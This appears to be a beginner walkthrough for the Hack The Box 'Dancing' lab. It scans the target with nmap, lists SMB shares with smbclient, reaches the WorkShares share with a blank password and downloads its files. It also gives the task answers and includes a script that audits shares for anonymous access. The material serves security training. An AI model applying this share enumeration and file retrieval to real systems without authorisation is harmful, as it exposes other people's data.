The aim of this walkthrough is to provide help with the Dancing machine on the Hack The Box website. Please note that no flags are directly provided here. Moreover, be aware that this is only one of the many ways to solve the challenges.
It belongs to a series of tutorials that aim to help out complete beginners with finishing the Starting Point TIER 0 challenges.
SETUP
There are a couple of ways to connect to the target machine. The one we will be using throughout this walkthrough is via the provided pwnbox.
Once our connection is taken care of, we spawn the target machine.
Additionally - even though not required - it is possible to set a shell variable (available only in the current shell, since it is not exported) containing our target host's IP address. Once set, we can easily reference it by prepending a $ to the variable name.
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $rhost=<target-hosts-ip>
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $ echo $rhost
<target-hosts-ip>
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $
You can use the unset command to remove it once you no longer need it.
┌─[✗]─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $unset rhost
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $
TASK 1
Question: What does the 3-letter acronym SMB stand for?
A simple internet search should help you out.
server message block
TASK 2
Question: What port does SMB use to operate at?
Just like before, use the internet.
445
TASK 3
Question: What is the service name for port 445 that came up in our Nmap scan?
Use nmap to scan the top 1000 ports on the target machine:
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $nmap $rhost
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-04 10:49 BST
Nmap scan report for 10.129.1.12
Host is up (0.064s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 0.78 seconds
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $
The default nmap configuration should provide you with the correct service name from the get-go.
microsoft-ds
TASK 4
Question: What is the ‘flag’ or ‘switch’ we can use with the SMB tool to ‘list’ the contents of the share?
One way to search for commands (their manual pages really) that contain a specific word (like smb here) is to use apropos. It searches the installed manual pages and descriptions for the provided name (string).
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $apropos smb
cifsdd (8) - convert and copy a file over SMB
filesystems (5) - Linux filesystem types: ext, ext2, ext3, ext4, hpfs, iso9660, JFS, m...
fs (5) - Linux filesystem types: ext, ext2, ext3, ext4, hpfs, iso9660, JFS, m...
libsmbclient (7) - An extension library for browsers and that can be used as a generic ...
mdsearch (1) - Run Spotlight searches against an SMB server
samba (7) - A Windows AD and SMB/CIFS fileserver for UNIX
samba (8) - Server to provide AD and SMB/CIFS services to clients
samba-dcerpcd (8) - This is one of Samba's DCERPC server processes that can listen on so...
smb.conf (5) - The configuration file for the Samba suite
smbcacls (1) - Set or get ACLs on an NT file or directory names
smbclient (1) - ftp-like client to access SMB/CIFS resources on servers
smbcontrol (1) - send messages to smbd, nmbd or winbindd processes
smbcquotas (1) - Set or get QUOTAs of NTFS 5 shares
smbd (8) - server to provide SMB/CIFS services to clients
smbget (1) - wget-like utility for download files over SMB
smbgetrc (5) - configuration file for smbget
smbmap (1) - SMB enumeration tool
smbpasswd (5) - The Samba encrypted password file
smbpasswd (8) - change a user's SMB password
smbspool (8) - send a print file to an SMB printer
smbspool_krb5_wrapper (8) - This is a CUPS printing backend which calls smbspool
smbstatus (1) - report on current Samba connections
smbtar (1) - shell script for backing up SMB/CIFS shares directly to UNIX tape dr...
smbtree (1) - A text based smb network browser
testparm (1) - check an smb.conf configuration file for internal correctness
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $
One promising candidate is the smbclient command. Use its help option to get to the correct answer.
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $smbclient --help
Usage: smbclient [OPTIONS] service <password>
-M, --message=HOST Send message
-I, --ip-address=IP Use this IP to connect to
-E, --stderr Write messages to stderr instead of stdout
-L, --list=HOST Get a list of shares available on a host
-T, --tar=<c|x>IXFvgbNan Command line tar
-D, --directory=DIR Start from directory
-c, --command=STRING Execute semicolon separated commands
-b, --send-buffer=BYTES Changes the transmit/send buffer
-t, --timeout=SECONDS Changes the per-operation timeout
-p, --port=PORT Port to connect to
-g, --grepable Produce grepable output
-q, --quiet Suppress help message
-B, --browse Browse SMB servers using DNS
Help options:
-?, --help Show this help message
--usage Display brief usage message
Common Samba options:
-d, --debuglevel=DEBUGLEVEL Set debug level
--debug-stdout Send debug output to standard output
-s, --configfile=CONFIGFILE Use alternative configuration file
--option=name=value Set smb.conf option from command line
-l, --log-basename=LOGFILEBASE Basename for log/debug files
--leak-report enable talloc leak reporting on exit
--leak-report-full enable full talloc leak reporting on exit
Connection options:
-R, --name-resolve=NAME-RESOLVE-ORDER Use these name resolution services only
-O, --socket-options=SOCKETOPTIONS socket options to use
-m, --max-protocol=MAXPROTOCOL Set max protocol level
-n, --netbiosname=NETBIOSNAME Primary netbios name
--netbios-scope=SCOPE Use this Netbios scope
-W, --workgroup=WORKGROUP Set the workgroup name
--realm=REALM Set the realm name
Credential options:
-U, --user=[DOMAIN/]USERNAME[%PASSWORD] Set the network username
-N, --no-pass Don't ask for a password
--password=STRING Password
--pw-nt-hash The supplied password is the NT hash
-A, --authentication-file=FILE Get the credentials from a file
-P, --machine-pass Use stored machine account password
--simple-bind-dn=DN DN to use for a simple bind
--use-kerberos=desired|required|off Use Kerberos authentication
--use-krb5-ccache=CCACHE Credentials cache location for Kerberos
--use-winbind-ccache Use the winbind ccache for authentication
--client-protection=sign|encrypt|off Configure used protection for client
connections
Deprecated legacy options:
-k, --kerberos DEPRECATED: Migrate to --use-kerberos
Version options:
-V, --version Print version
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $
-L
TASK 5
Question: How many shares are there on Dancing?
Use both the -L (list the shares) and the -N (suppress the password prompt) options to list the shares.
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $smbclient -p 445 -N -L \\$rhost\\
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
WorkShares Disk
SMB1 disabled -- no workgroup available
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $
4
TASK 6
Question: What is the name of the share we are able to access in the end with a blank password?
Let's try to access the shares one by one. Both the ADMIN$ and the C$ share are protected (the tree connect fails with NT_STATUS_ACCESS_DENIED). The IPC$ share, on the other hand, is simply empty. Therefore, the answer must be the last one.
Inside the smb connection, run the help command to list the available commands.
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $smbclient -p 445 -N \\\\$rhost\\ADMIN$
tree connect failed: NT_STATUS_ACCESS_DENIED
┌─[✗]─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $smbclient -p 445 -N \\\\$rhost\\C$
tree connect failed: NT_STATUS_ACCESS_DENIED
┌─[✗]─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $smbclient -p 445 -N \\\\$rhost\\IPC$
Try "help" to get a list of possible commands.
smb: \> help
? allinfo altname archive backup
blocksize cancel case_sensitive cd chmod
chown close del deltree dir
du echo exit get getfacl
geteas hardlink help history iosize
lcd link lock lowercase ls
l mask md mget mkdir
more mput newer notify open
posix posix_encrypt posix_open posix_mkdir posix_rmdir
posix_unlink posix_whoami print prompt put
pwd q queue quit readlink
rd recurse reget rename reput
rm rmdir showacls setea setmode
scopy stat symlink tar tarmode
timeout translate unlock volume vuid
wdel logon listconnect showconnect tcon
tdis tid utimes logoff ..
!
smb: \> help help
HELP help:
[command] give help on a command
WorkShares
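As an added example (not part of the original walkthrough), the share listing and the per-share blank-password checks of Tasks 5 and 6 as a small POSIX shell audit script. It assumes smbclient is installed and takes the target host as its first argument; the embedded listing is constructed from the output shown above.

```shell
#!/bin/sh
# Added example, not part of the original walkthrough: list a host's SMB shares
# and check which Disk shares allow a blank-password (-N) listing (Tasks 5 and 6).

# Constructed sample input: the share table from the walkthrough, in the
# layout smbclient -L prints it.
sample_listing() {
    cat <<'EOF'
        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        WorkShares      Disk
SMB1 disabled -- no workgroup available
EOF
}

# Read smbclient -L output on stdin and print "name type" per share; the
# header, the dashed rule and the trailing status line have no such 2nd field.
parse_shares() {
    awk '$2 == "Disk" || $2 == "IPC" || $2 == "Printer" { print $1, $2 }'
}

# Number of shares in a listing (the Task 5 answer for the sample).
count_shares() {
    parse_shares | wc -l | tr -d ' '
}

# Attempt a blank-password directory listing of one share. A failed tree
# connect (NT_STATUS_ACCESS_DENIED) makes smbclient exit non-zero.
probe_share() {
    host=$1; share=$2
    if smbclient -N -p 445 "//$host/$share" -c 'ls' >/dev/null 2>&1; then
        echo "$share: anonymous listing allowed"
    else
        echo "$share: denied"
    fi
}

# Audit every Disk share of a host; IPC$ is not a file share and is skipped.
audit_host() {
    host=$1
    smbclient -N -p 445 -L "//$host" 2>/dev/null | parse_shares |
        while read -r name type; do
            [ "$type" = "Disk" ] && probe_share "$host" "$name"
        done
}
if [ -n "${1:-}" ]; then audit_host "$1"; fi
```

Run it against your own file server to confirm that only the shares you intend to expose answer a blank-password listing.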
TASK 7
Question: What is the command we can use within the SMB shell to download the files we find?
Use help to get a better idea of what the commands actually do.
smb: \> help ls
HELP ls:
<mask> list the contents of the current directory
smb: \> help get
HELP get:
<remote name> [local name] get a file
smb: \> help exit
HELP exit:
logoff the server
smb: \> exit
get
SUBMIT FLAG
Question: Submit root flag
Connect to the WorkShares share and look around a bit. Let’s grab and download all the files we find.
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $smbclient -p 445 -N \\\\$rhost\\WorkShares
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Mar 29 09:22:01 2021
.. D 0 Mon Mar 29 09:22:01 2021
Amy.J D 0 Mon Mar 29 10:08:24 2021
James.P D 0 Thu Jun 3 09:38:03 2021
5114111 blocks of size 4096. 1751385 blocks available
smb: \> cd Amy.J
smb: \Amy.J\> ls
. D 0 Mon Mar 29 10:08:24 2021
.. D 0 Mon Mar 29 10:08:24 2021
worknotes.txt A 94 Fri Mar 26 11:00:37 2021
5114111 blocks of size 4096. 1751385 blocks available
smb: \Amy.J\> get worknotes.txt
getting file \Amy.J\worknotes.txt of size 94 as worknotes.txt (1.7 KiloBytes/sec) (average 1.7 KiloBytes/sec)
smb: \Amy.J\> cd ..
smb: \> ls
. D 0 Mon Mar 29 09:22:01 2021
.. D 0 Mon Mar 29 09:22:01 2021
Amy.J D 0 Mon Mar 29 10:08:24 2021
James.P D 0 Thu Jun 3 09:38:03 2021
5114111 blocks of size 4096. 1751385 blocks available
smb: \> cd James.P\
smb: \James.P\> ls
. D 0 Thu Jun 3 09:38:03 2021
.. D 0 Thu Jun 3 09:38:03 2021
flag.txt A 32 Mon Mar 29 10:26:57 2021
5114111 blocks of size 4096. 1751385 blocks available
smb: \James.P\> get flag.txt
getting file \James.P\flag.txt of size 32 as flag.txt (0.6 KiloBytes/sec) (average 1.2 KiloBytes/sec)
smb: \James.P\> exit
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $
Once the file containing the flag is found, grab the flag. On a side note, it is always good practice to check out the other files you may find. They might give you a clue about what exactly is happening on your target.
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $ll
total 24K
-rw-r--r-- 1 htb-bluewalle htb-bluewalle 32 May 4 11:20 flag.txt
lrwxrwxrwx 1 root root 24 May 4 08:41 htb_vpn_logs.log -> /var/log/openvpn/htb.log
-rw-r--r-- 1 root root 43 May 4 08:41 my_credentials.txt
lrwxrwxrwx 1 root root 27 May 4 08:41 my_data -> /home/htb-bluewalle/my_data
-rwxr-xr-x 1 htb-bluewalle htb-bluewalle 2.1K May 4 08:40 README.license
-rw-r--r-- 1 htb-bluewalle htb-bluewalle 94 May 4 11:19 worknotes.txt
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $cat worknotes.txt
- start apache server on the linux machine
- secure the ftp server
- setup winrm on dancing
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $cat flag.txt
<flag>
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $
flag
Make sure to terminate the target box before you continue with the next machine!